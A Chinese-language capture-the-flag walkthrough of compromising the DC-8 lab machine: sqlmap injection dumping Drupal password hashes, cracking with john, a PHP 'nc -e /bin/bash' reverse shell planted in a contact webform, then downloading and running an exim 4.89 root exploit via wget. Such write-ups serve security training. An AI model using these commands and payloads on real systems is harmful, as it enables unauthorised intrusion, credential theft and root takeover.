DC-8渗透过程(kali IP:192.168.229.132 靶机IP:192.168.229.156)
**一.信息收集**
nmap -sP 192.168.229.0/24
nmap -sV -p- 192.168.229.156
dirsearch -u 192.168.229.156 -e * -x 403,404
whatweb 192.168.229.156
得到信息:cms:drupal 7.67 语言:php 中间件:apache
**二.漏洞查找和利用**
sqlmap -u "http://192.168.229.156/?nid=3" --dbs --batch //漏洞库查找没有可以利用的,msf试了也都不行,看这个url就感觉可能会有sql注入,加个冒号报错,则证明很可能有sql注入,丢到sqlmap里面跑还真跑出来了
sqlmap -u "http://192.168.229.156/?nid=3" --tables -D d7db --batch
sqlmap -u "http://192.168.229.156/?nid=3" --columns -T users -D d7db --batch
sqlmap -u "http://192.168.229.156/?nid=3" --dump -C name,pass -T users -D d7db --batch //得到两个加密密码丢到john里面爆破
john test //得到john的密码是turtle,admin的爆破不出来
<?php @exec("nc -e /bin/bash 192.168.229.132 8888")?> //登录进去查找发现cotact us里面的webform的form setting 里面可以写PHP代码,写入反弹shell,在随便提交一个contact us触发PHP代码,连接到虚拟shell
**三.提权**
cd /home //查看用户信息发现什么都没有
find / -perm -u=s -type f 2>/dev/null //查看suid文件发现有exim4
exim --version //版本4.89
searchsploit exim //有可以利用的提权漏洞,复制下来
locate linux/local/46996.sh
cp /usr/share/exploitdb/exploits/linux/local/46996.sh test
python3 -m http.server
cd /tmp //虚拟shell中
wget http://192.168.229.132:8000/test
chmod 777 test
./test 发现没有提权成功,用脚本里面说的另一种方式
./test -m netcat //提权成功
find / -name * flag.*
cat /root/flag.txt